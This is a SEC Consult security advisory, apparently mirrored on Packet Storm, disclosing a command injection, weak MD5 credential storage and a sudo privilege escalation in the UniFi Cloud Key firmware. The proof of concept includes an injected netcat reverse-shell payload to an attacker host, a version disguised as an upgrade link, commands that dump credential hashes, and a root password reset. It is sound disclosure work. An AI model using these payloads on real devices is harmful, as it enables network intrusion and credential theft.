Ubiquiti Networks UniFi Cloud Key Command Injection / Privilege Escalation

2017-07-27T00:00:00
ID PACKETSTORM:143525
Type packetstorm
Reporter T. Weber
Modified 2017-07-27T00:00:00

Description

                                        
                                            `SEC Consult Vulnerability Lab Security Advisory < 20170727-0 >  
=======================================================================  
title: Authenticated Command Injection &  
Cloud User Weak Crypto & Privilege Escalation  
product: Ubiquiti Networks UniFi Cloud Key  
vulnerable version: Firmware v0.5.9/0.6.0  
fixed version: Firmware v0.6.1  
CVE number:  
impact: Critical  
homepage: https://www.ubnt.com  
found: 2017-01-31  
by: T. Weber (Office Vienna)  
SEC Consult Vulnerability Lab  
  
An integrated part of SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
"Ubiquiti Networks develops high-performance networking  
technology for service providers and enterprises. Our technology  
platforms focus on delivering highly advanced and easily deployable  
solutions that appeal to a global customer base in underserved and  
underpenetrated markets."  
  
Source: http://ir.ubnt.com/  
  
  
Business recommendation:  
------------------------  
SEC Consult recommends not to use this device in production until a thorough  
security review has been performed by security professionals and all  
identified issues have been resolved.  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Command Injection & Cloud User Weak Crypto  
The manual UniFi Cloud Key firmware upgrade function is prone to a command  
injection vulnerability which can be exploited for example by sending a  
manipulated upgrade link to a victim.  
  
A reverse-shell can be used to get access to the device and this allows  
an attacker to get access to the internal network of the attacked user.  
The web user is "www-data" which has only few access and execution rights  
but by exploiting vulnerability 2) it is possible to gain root access on  
the device!  
  
After a successful command injection the cloud user account password hash  
can be dumped. Since the UniFi Cloud Key has to communicate with the access  
points and configure their passwords as well, a hash has to be stored at  
another place than /etc/shadow to persist the keys on the devices.  
The hashes are stored in "system.cfg" using only MD5 hashing algorithm which  
can be cracked easily in reasonable time.  
  
This configuration file consists the username and the password hash of the  
cloud user which is the same on all access points and the UniFi Cloud Key.  
  
This configuration can be read by the user "www-data". Afterwards, the hash  
can be cracked and the cloud user is hijacked. A remote-configuration of the  
wireless lan of the user is now possible for an attacker.  
  
2) Privilege Escalation  
The password of the root user can be changed by a lower privileged user on  
the device. This is possible because some binaries can be executed with sudo  
by this user without the root password.  
  
  
Proof of concept:  
-----------------  
1) Authenticated Command Injection & Cloud-User Hash Leak  
The following PHP snipplet is responsible for the command execution:  
  
(api.inc, line 476)  
-------------------------------------------------------------------------------  
exec(CMD_WGET . $url . CMD_WGET_OPTIONS, $out, $rc);  
return CMD_WGET . $url . CMD_WGET_OPTIONS;  
}  
[...]  
-------------------------------------------------------------------------------  
  
The following link opens a reverse-shell:  
;busybox nc <Attacker-IP> <Attacker-Port> -e /bin/bash;  
  
To 'hide' the command from the eyes of the user in the upgrade window, one can  
also decorate the link:  
;busybox nc 192.168.3.142 8999 -e /bin/bash; https://secconsult.build-1337.bin  
  
As listener, netcat was used:  
$ nc -lvp <Attacker-Port>  
  
  
To hijack the cloud account, steal username and password hash:  
(user: www-data)  
$ cd /srv/unifi/data/devices/uap/  
$ ls  
<serial-number-of-an-ap>  
$ cd <serial-number-of-an-ap>  
$ cat system.cfg | grep "users\.1\.name"  
users.1.name=<username>  
$ cat system.cfg | grep "users\.1\.password"  
users.1.password=<password>  
  
The root password hash in /etc/shadow is SHA-512 hashed, but in system.cfg  
the same password is just MD5 hashed and can be cracked easily in reasonable  
time.  
  
  
2) Privilege Escalation  
Because of the following line in /etc/sudoers.d/cloudkey-webui one can elevate  
the rights of www-data to root:  
  
(cloudkey-webui, line 1)  
-------------------------------------------------------------------------------  
www-data ALL=NOPASSWD:/sbin/ubnt-systool, /usr/bin/apt-get, /usr/sbin/service  
unifi *, /usr/bin/java  
-------------------------------------------------------------------------------  
  
With the following commands one can change the root password without actually  
knowing it:  
(user: www-data)  
$ cd /tmp  
$ echo "root:password" > newfile.txt  
$ /usr/bin/sudo /sbin/ubnt-systool chpasswd < newfile.txt  
  
The root password is now changed to 'password'.  
SSH login is also possible:  
$ ssh root@<IP-Address>  
  
  
Vulnerable / tested versions:  
-----------------------------  
Ubiquiti Networks UniFi Cloud Key version 0.5.9/0.6.0 has been tested.  
This version was the latest at the time the security vulnerabilities  
were discovered.  
  
  
Vendor contact timeline:  
------------------------  
2017-02-03: Contacting vendor via HackerOne.  
2017-02-05: Providing PoC video via HackerOne.  
2017-02-06: Vendor sets status to "Triaged".  
2017-02-21: Asking for a status update; No answer.  
2017-03-01: Inform the vendor that the advisory will be published at  
2017-03-27; No answer.  
2017-03-17: Asking for a status update.  
2017-03-20: Vendor states that fix will be available in v0.6.1.  
2017-03-21: Asking vendor when the update will be available. Found  
update on vendor homepage (available since 2017-03-20).  
2017-03-21: Vendor asks for more time. Set release date to 2017-06-25.  
2017-03-27: Fixed version is available - provide at least 90 days for  
customers to apply the patch.  
2017-05-15: Contacted vendor via e-mail and set the publication date  
to 2017-06-27.  
2017-06-26: Shifted publication date back to 2017-07-27 to provide more  
for customers to apply the patch.  
2017-07-27: Public release of security advisory  
  
Solution:  
---------  
Upgrade to firmware v0.6.1 or later.  
  
  
Workaround:  
-----------  
None  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
SEC Consult Vulnerability Lab  
  
SEC Consult  
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow  
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich  
  
About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It  
ensures the continued knowledge gain of SEC Consult in the field of network  
and application security to stay ahead of the attacker. The SEC Consult  
Vulnerability Lab supports high-quality penetration testing and the evaluation  
of new offensive and defensive technologies for our customers. Hence our  
customers obtain the most current information about vulnerabilities and valid  
recommendation about the risk profile of new technologies.  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://www.sec-consult.com/en/Career.htm  
  
Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Mail: research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult  
  
EOF T. Weber / @2017  
  
`